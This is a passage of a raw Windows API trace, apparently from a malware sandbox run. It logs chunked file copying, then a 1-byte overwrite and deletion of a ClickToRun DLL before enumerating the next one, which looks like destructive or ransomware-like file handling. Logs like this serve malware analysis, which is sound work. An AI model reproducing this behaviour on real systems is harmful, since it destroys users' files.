(dwErrCode=0x0) [0090.312] GetLastError () returned 0x0 [0090.312] SetLastError (dwErrCode=0x0) [0090.312] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0090.312] WriteFile (in: hFile=0x368, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0090.313] GetLastError () returned 0x0 [0090.313] SetLastError (dwErrCode=0x0) [0090.313] GetLastError () returned 0x0 [0090.313] SetLastError (dwErrCode=0x0) [0090.313] GetLastError () returned 0x0 [0090.313] SetLastError (dwErrCode=0x0) [0090.313] GetLastError () returned 0x0 [0090.313] SetLastError (dwErrCode=0x0) [0090.313] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0090.313] WriteFile (in: hFile=0x368, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0090.314] GetLastError () returned 0x0 [0090.314] SetLastError (dwErrCode=0x0) [0090.314] GetLastError () returned 0x0 [0090.314] SetLastError (dwErrCode=0x0) [0090.314] GetLastError () returned 0x0 [0090.314] SetLastError (dwErrCode=0x0) [0090.314] GetLastError () returned 0x0 [0090.314] SetLastError (dwErrCode=0x0) [0090.314] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0090.314] WriteFile (in: hFile=0x368, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0090.314] GetLastError () returned 0x0 [0090.314] SetLastError (dwErrCode=0x0) [0090.315] GetLastError () returned 0x0 [0090.315] SetLastError (dwErrCode=0x0) [0090.315] GetLastError () returned 0x0 [0090.315] SetLastError (dwErrCode=0x0) [0090.315] GetLastError () returned 0x0 [0090.315] SetLastError (dwErrCode=0x0) [0090.315] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0090.315] WriteFile (in: hFile=0x368, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0090.315] GetLastError () returned 0x0 [0090.315] SetLastError (dwErrCode=0x0) [0090.315] GetLastError () returned 0x0 [0090.315] SetLastError (dwErrCode=0x0) [0090.315] GetLastError () returned 0x0 [0090.316] SetLastError (dwErrCode=0x0) [0090.316] GetLastError () returned 0x0 [0090.316] SetLastError (dwErrCode=0x0) [0090.316] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0090.316] WriteFile (in: hFile=0x368, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0090.316] GetLastError () returned 0x0 [0090.316] SetLastError (dwErrCode=0x0) [0090.316] GetLastError () returned 0x0 [0090.316] SetLastError (dwErrCode=0x0) [0090.316] GetLastError () returned 0x0 [0090.316] SetLastError (dwErrCode=0x0) [0090.317] GetLastError () returned 0x0 [0090.317] SetLastError (dwErrCode=0x0) [0090.317] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0090.317] WriteFile (in: hFile=0x368, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0090.317] GetLastError () returned 0x0 [0090.317] SetLastError (dwErrCode=0x0) [0090.317] GetLastError () returned 0x0 [0090.317] SetLastError (dwErrCode=0x0) [0090.317] GetLastError () returned 0x0 [0090.317] SetLastError (dwErrCode=0x0) [0090.317] GetLastError () returned 0x0 [0090.317] SetLastError (dwErrCode=0x0) [0090.318] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0090.318] WriteFile (in: hFile=0x368, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0090.318] GetLastError () returned 0x0 [0090.318] SetLastError (dwErrCode=0x0) [0090.318] GetLastError () returned 0x0 [0090.318] SetLastError (dwErrCode=0x0) [0090.318] GetLastError () returned 0x0 [0090.318] SetLastError (dwErrCode=0x0) [0090.318] GetLastError () returned 0x0 [0090.318] SetLastError (dwErrCode=0x0) [0090.318] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0090.319] WriteFile (in: hFile=0x368, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0090.319] GetLastError () returned 0x0 [0090.319] SetLastError (dwErrCode=0x0) [0090.319] GetLastError () returned 0x0 [0090.319] SetLastError (dwErrCode=0x0) [0090.319] GetLastError () returned 0x0 [0090.319] SetLastError (dwErrCode=0x0) [0090.319] GetLastError () returned 0x0 [0090.319] SetLastError (dwErrCode=0x0) [0090.319] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0090.319] WriteFile (in: hFile=0x368, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0090.320] GetLastError () returned 0x0 [0090.320] SetLastError (dwErrCode=0x0) [0090.320] GetLastError () returned 0x0 [0090.320] SetLastError (dwErrCode=0x0) [0090.320] GetLastError () returned 0x0 [0090.320] SetLastError (dwErrCode=0x0) [0090.320] GetLastError () returned 0x0 [0090.320] SetLastError (dwErrCode=0x0) [0090.320] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0090.320] WriteFile (in: hFile=0x368, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0090.320] GetLastError () returned 0x0 [0090.320] SetLastError (dwErrCode=0x0) [0090.321] GetLastError () returned 0x0 [0090.321] SetLastError (dwErrCode=0x0) [0090.321] GetLastError () returned 0x0 [0090.321] SetLastError (dwErrCode=0x0) [0090.321] GetLastError () returned 0x0 [0090.321] SetLastError (dwErrCode=0x0) [0090.321] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0090.321] WriteFile (in: hFile=0x368, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0090.321] GetLastError () returned 0x0 [0090.321] SetLastError (dwErrCode=0x0) [0090.321] GetLastError () returned 0x0 [0090.321] SetLastError (dwErrCode=0x0) [0090.322] GetLastError () returned 0x0 [0090.322] SetLastError (dwErrCode=0x0) [0090.322] GetLastError () returned 0x0 [0090.322] SetLastError (dwErrCode=0x0) [0090.322] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0090.322] WriteFile (in: hFile=0x368, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0090.322] GetLastError () returned 0x0 [0090.322] SetLastError (dwErrCode=0x0) [0090.322] GetLastError () returned 0x0 [0090.322] SetLastError (dwErrCode=0x0) [0090.322] GetLastError () returned 0x0 [0090.322] SetLastError (dwErrCode=0x0) [0090.322] GetLastError () returned 0x0 [0090.323] SetLastError (dwErrCode=0x0) [0090.323] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x4c0, lpOverlapped=0x0) returned 1 [0090.323] WriteFile (in: hFile=0x368, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0090.323] GetLastError () returned 0x0 [0090.323] SetLastError (dwErrCode=0x0) [0090.323] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0090.323] GetLastError () returned 0x0 [0090.323] SetLastError (dwErrCode=0x0) [0090.323] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d618 | out: hHeap=0x20000) returned 1 [0090.323] WriteFile (in: hFile=0x368, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x4c0, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327ef70*=0x4c0, lpOverlapped=0x0) returned 1 [0090.324] GetLastError () returned 0x0 [0090.324] SetLastError (dwErrCode=0x0) [0090.324] GetLastError () returned 0x0 [0090.324] SetLastError (dwErrCode=0x0) [0090.324] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35190 | out: hHeap=0x20000) returned 1 [0090.324] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0090.324] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350f0 | out: hHeap=0x20000) returned 1 [0090.324] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0090.324] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x90450 | out: hHeap=0x20000) returned 1 [0090.324] CloseHandle (hObject=0x368) returned 1 [0090.326] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8f448 | out: hHeap=0x20000) returned 1 [0090.326] CloseHandle (hObject=0x418) returned 1 [0090.327] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0090.327] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0090.327] AreFileApisANSI () returned 1 [0090.327] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 92 [0090.327] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb8) returned 0x4ebc8 [0090.327] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71960, cbMultiByte=-1, lpWideCharStr=0x4ebc8, cchWideChar=92 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-private-l1-1-0.dll") returned 92 [0090.327] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-private-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-private-l1-1-0.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0090.446] GetFileType (hFile=0x360) returned 0x1 [0090.446] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0090.446] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x90450 [0090.446] GetLastError () returned 0xb7 [0090.447] SetLastError (dwErrCode=0xb7) [0090.447] WriteFile (in: hFile=0x360, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0090.447] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x90450 | out: hHeap=0x20000) returned 1 [0090.448] CloseHandle (hObject=0x360) returned 1 [0090.448] AreFileApisANSI () returned 1 [0090.448] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 92 [0090.448] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb8) returned 0x4ebc8 [0090.448] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71960, cbMultiByte=-1, lpWideCharStr=0x4ebc8, cchWideChar=92 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-private-l1-1-0.dll") returned 92 [0090.448] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-private-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-private-l1-1-0.dll")) returned 1 [0090.449] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0090.449] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0090.449] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0090.449] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0090.449] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0090.449] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0090.449] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0090.449] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60088 | out: hHeap=0x20000) returned 1 [0090.449] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d4c8 | out: hHeap=0x20000) returned 1 [0090.449] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d7b0 | out: hHeap=0x20000) returned 1 [0090.449] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4f220 | out: hHeap=0x20000) returned 1 [0090.449] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8bf40 | out: hHeap=0x20000) returned 1 [0090.449] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0090.449] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0090.449] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0090.449] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0090.449] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0090.450] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0090.450] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.450] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.450] FindNextFileW (in: hFindFile=0x78490, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x4cc0, dwReserved0=0x1, dwReserved1=0x202f4, cFileName="api-ms-win-crt-process-l1-1-0.dll", cAlternateFileName="APFCAD~1.DLL")) returned 1 [0090.450] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0090.450] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0090.450] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0090.450] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x693a0 [0090.450] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0090.450] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d058 [0090.450] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d738 [0090.450] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d3c8 [0090.450] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d738 | out: hHeap=0x20000) returned 1 [0090.450] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d058 | out: hHeap=0x20000) returned 1 [0090.450] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x693a0 | out: hHeap=0x20000) returned 1 [0090.450] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d3c8 | out: hHeap=0x20000) returned 1 [0090.450] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0090.450] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35170 [0090.450] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0090.450] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35170 | out: hHeap=0x20000) returned 1 [0090.450] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0090.450] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f10 [0090.450] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0090.450] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f10 | out: hHeap=0x20000) returned 1 [0090.450] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d3c8 [0090.450] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6de98 [0090.450] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cfa8 [0090.450] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc0) returned 0x4ebc8 [0090.450] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6de98 | out: hHeap=0x20000) returned 1 [0090.450] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cfa8 | out: hHeap=0x20000) returned 1 [0090.450] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc0) returned 0x55f20 [0090.450] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0090.450] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.450] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.450] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.450] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.451] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0090.451] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d3c8 | out: hHeap=0x20000) returned 1 [0090.451] AreFileApisANSI () returned 1 [0090.451] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-process-l1-1-0.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-process-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 92 [0090.451] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71550 [0090.451] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.451] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.451] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0090.451] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0090.451] AreFileApisANSI () returned 1 [0090.451] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71550, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 92 [0090.451] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb8) returned 0x55f20 [0090.451] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71550, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=92 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-process-l1-1-0.dll") returned 92 [0090.451] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-process-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-process-l1-1-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0090.451] GetFileType (hFile=0x360) returned 0x1 [0090.451] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0090.452] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0090.452] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0090.452] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0090.452] CloseHandle (hObject=0x360) returned 1 [0090.452] AreFileApisANSI () returned 1 [0090.452] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71550, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 92 [0090.452] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb8) returned 0x55f20 [0090.452] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71550, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=92 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-process-l1-1-0.dll") returned 92 [0090.452] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-process-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-process-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0090.452] GetFileType (hFile=0x360) returned 0x1 [0090.452] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0090.453] CloseHandle (hObject=0x360) returned 1 [0090.453] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0090.453] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0090.453] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0090.453] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0090.453] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0090.453] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0090.471] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0090.471] 